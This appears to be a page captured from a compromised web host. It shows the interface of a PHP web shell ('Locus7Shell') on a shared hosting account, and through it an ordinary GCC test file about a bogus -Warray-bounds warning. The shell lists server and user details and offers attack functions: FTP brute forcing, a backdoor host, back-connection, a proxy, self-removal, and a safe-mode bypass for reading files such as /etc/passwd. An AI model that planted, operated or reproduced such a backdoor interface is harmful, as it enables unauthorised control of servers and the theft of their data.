Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     Wrestrict-2.c (1.07 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Test to verify that the temporary doesn't trigger a bogus -Warray-bounds
   warning.  Distilled from libat_exchange_large_inplace in libatomic/gexch.c.
   { dg-do compile }
   { dg-options "-O2 -Wall" }  */

typedef typeof (sizeof 0) size_t;

extern void *memcpy (void*, const void*, size_t);

void libat_exchange_large_inplace (size_t n, void *mptr, void *vptr)
{
  char temp[1024];

  size_t i = 0;

  for (i = 0; n >= 1024; i += 1024, n -= 1024)
    {
      memcpy (temp, mptr + i, 1024);

      /* The memcpy call below results in the following:
     unsigned long ivtmp.7;

     ivtmp.7_4 = (unsigned long) mptr_9(D);
     ...
     <bb 4>
     # ivtmp.7_22 = PHI <ivtmp.7_4(3), ivtmp.7_5(4)>
     ...
     _1 = (void *) ivtmp.7_22;
     ...
     memcpy (_1, _2, 1024);

     Treating _1 as a pointer results in the bogus:
       warning: 'memcpy' offset 0 is out of the bounds [0, 8] of object 'ivtmp.7' with type 'long unsigned int' [-Warray-bounds]
       memcpy (mptr + i, vptr + i, 1024);
       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      */
      memcpy (mptr + i, vptr + i, 1024);

      memcpy (vptr + i, temp, 1024);
    }
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0056 ]--